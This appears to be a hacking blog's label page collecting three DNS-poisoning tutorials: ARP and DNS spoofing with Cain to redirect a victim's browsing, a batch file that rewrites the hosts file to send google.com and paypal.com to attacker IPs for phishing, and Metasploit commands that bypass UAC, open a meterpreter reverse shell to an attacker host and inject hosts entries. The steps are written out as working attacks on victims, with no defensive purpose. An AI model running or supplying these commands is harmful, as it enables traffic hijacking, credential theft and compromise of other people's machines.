Showing posts with label dns-spoof. Show all posts
Showing posts with label dns-spoof. Show all posts

Wednesday, January 7, 2015

How to do DNS SPOOF(tutorial)?

First What is the DNS ? (wikipedia.org)

The Domain Name System (DNS) is a hierarchical naming system for computers, services, or any resource connected to the internet or a private network. It associates various information with domain names assigned to each of the participants. For example, http://www.example.com translates to208.77.188.166.

What does poisoning the DNS allow us to do ?

It allows us to redirect the traffic to another website.
First This is the structure of the network :

DNS-SPOOF

1 , 2 and 3 are computers
1 is the computer being the gateway (could be a router) (172.128.254.1)
2 is the target computer (172.128.254.10)
3 is the attacker using cain
Note : IPs are just used for this tutorial and chosen randomly.
Our work is on computer number 3 :
1-After you install cain , open it and go to the sniffer tab
2-Click on configure and choose your adapter

DNS-SPOOF

3-Enable the sniffer (click on the second icon in the toolbar next to the open icon)
4-Right click in the empty area and choose scan MAC addresses. We get the results above.
5-Click on the APR Tab
 
DNS-SPOOF

6-Click on the + sign in the toolbar to add a new ARP poison routing

DNS-SPOOF

7-choose the gateway which is 172.128.254.1 , in the next list you’ll get the IP of the computer 2 which is 172.128.254.10 and click ok

DNS-SPOOF

8-now click on the APR-DNS tab






DNS-SPOOF

9-click on the + sign

10-enter the web address that you want to spoof , (in this case when the user goes to facebook he’ll be redirected to myspace) click on resolve type the web address that you want to redirect the user to it, and click ok, and you’ll get the IP of the web address, then click ok

DNS-SPOOF 

you'll get something like this:

DNS-SPOOF

11-now to make this work we have to enable APR poisoning , click on the icon next to the sniffer icon, and everything should work as we expect.

Now the computer 2 will get the routes poisoned and when the user requests http://www.facebook.com he will be redirected to http://www.myspace.com .
Imagine what you can do with this technique.
Posted by at No comments:
Labels:

DNS poisoning using BATCH File

Batch file programming is the native programming offered by the Microsoft Windows Operating System. Batch file is created using any text editors like notepad, WordPad, WinWord or so on, which comprises of a sequence of built-in commands used to perform some often done tasks like deleting a series of files of same type or of different type, creating logs, clearing unwanted craps from your computer and even for creating a batch VIRUS.


DNS poisoning:


Batch file can has the tendency to modify the transfer zones by editing the hosts.txt file that resides inside ‘C:\windows\system32\drivers\etc\hosts.txt’, so that it will take you to some malicious websites instead of landing you to the legitimate website. This may also be used for phishing, i.e. redirecting you to a bogus website which looks exactly like the legitimate one, and then steal credentials.

1. Just open up a notepad, copy and paste the below code

@echo off

echo 10.199.64.66 www.google.com >> C:\windows\system32\drivers\etc\hosts.txt

echo 10.199.64.67 www.paypal.com >> C:\windows\system32\drivers\etc\hosts.txt

exit

2. Save it as a batch file with the extension .bat

3. Then run it on the Victims computer to infect it.

4.This program creates a new entry in the hosts file, so that whenever an user attempts to move to www.google.com, he will be re-directed to another host that has the IP address of 10.199.64.66, likewise if the user attempts to login to the paypal account by typing in www.paypal.com, he will be re-directed to another external bogus website that has the IP address of 10.199.64.67, where if the user enters the credentials unknowingly, they were into the hackers database and he can use it for several other purposes.
Posted by at No comments:
Labels:

D.N.S. poisoning using metasploit.

Today we will edit hot file of the Remote P.C which has been compromised. By editing Host file you can Redirect any website to any I.P address. Absolutely we will use metasploit.

(1)Hack remote p.c .(How to hack Remote P.C.?)

(2)Now we will Bypass U.A.C. protection of windows.

(3)Open Terminal & type following code in terminal

msfconsole

use exploit/windows/local/bypassuac

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.1.6

set session 1

exploit

(4)Now we will edit host file.

msf >use post/windows/manage/injet_host

msf post(injet_host) >set domain www.google.com

msf post(injet_host) >set ip Your Desired I.P.

msf post(injet_host) >set session 2

msf post(injet_host) >exploit

This will Redirect google.com in victim p.c to your desired I.P.
Posted by at No comments:
Labels:
Subscribe to: Posts (Atom)